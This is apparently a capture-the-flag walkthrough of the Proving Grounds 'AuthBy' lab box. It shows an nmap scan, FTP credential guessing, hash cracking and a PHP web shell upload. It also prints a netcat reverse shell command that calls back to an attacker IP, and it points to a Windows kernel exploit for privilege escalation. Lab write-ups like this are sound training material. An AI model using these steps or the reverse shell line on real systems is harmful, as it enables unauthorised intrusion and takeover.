Proving Grounds | AuthBy

Scanning:

Host is up, received user-set (0.24s latency).
Scanned at 2021–08–12 23:28:35 EDT for 240s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 zFTPServer 6.0 build 2011–10–17
242/tcp open http syn-ack ttl 127 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open zftp-admin syn-ack ttl 127 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.18 seconds
Raw packets sent: 131208 (5.773MB) | Rcvd: 153 (6.972KB)

Enumeration:

Anonymous access is enabled on Port 21.

Navigating to the accounts directory, we can observe the accounts on the ftp service.

Offsec, anonymous, admin

With these accounts present on the ftp service, we guess passwords for them or use hydra to bruteforce the password.

We are able to login to the admin account using admin:admin

Looks like we have landed on the web root directory and are able to view the .ht files.

We have the user offsec, it’s associated md5 password hash, and the path directory for the web server.

First off, let’s try to crack the hash to see if we can get any matching passwords on the rockyou.txt file.

Looks like we do → offsec:elite

We can use this credential to login to the site.

Exploitation:

Since we have admin access to the ftp service, we are able to upload to the web directory. We can upload a php web shell on it and access it on the browser to access our shell.

With our php webshell, we get remote code execution on the target.

Now that we have a foothold of the target, let’s transfer nc.exe on it so we can create a netcat reverse shell.

After the transfer of nc.exe, we simply run it to to connect back to our listener → http://192.168.149.46:242/shell.php?cmd=C:\Users\Public\nc.exe 192.168.49.149 21 -e cmd

Privilege Escalation:

Looking at the output for systeminfo, notice that the target has no patches installed and is running 2008 Windows Server.

There are couple of ways to escalate on this machine, most notably, juicy potato and a bunch of kernel exploits.

One of the kernel exploits is https://www.exploit-db.com/exploits/40564 wherein the AFD improperly validates input passed from user mode to the kernel.

The compiling instructions for the exploit are also included in the POC.

Now that we have our exploit binary ready, let’s transfer it on the target and run it to have system privileges.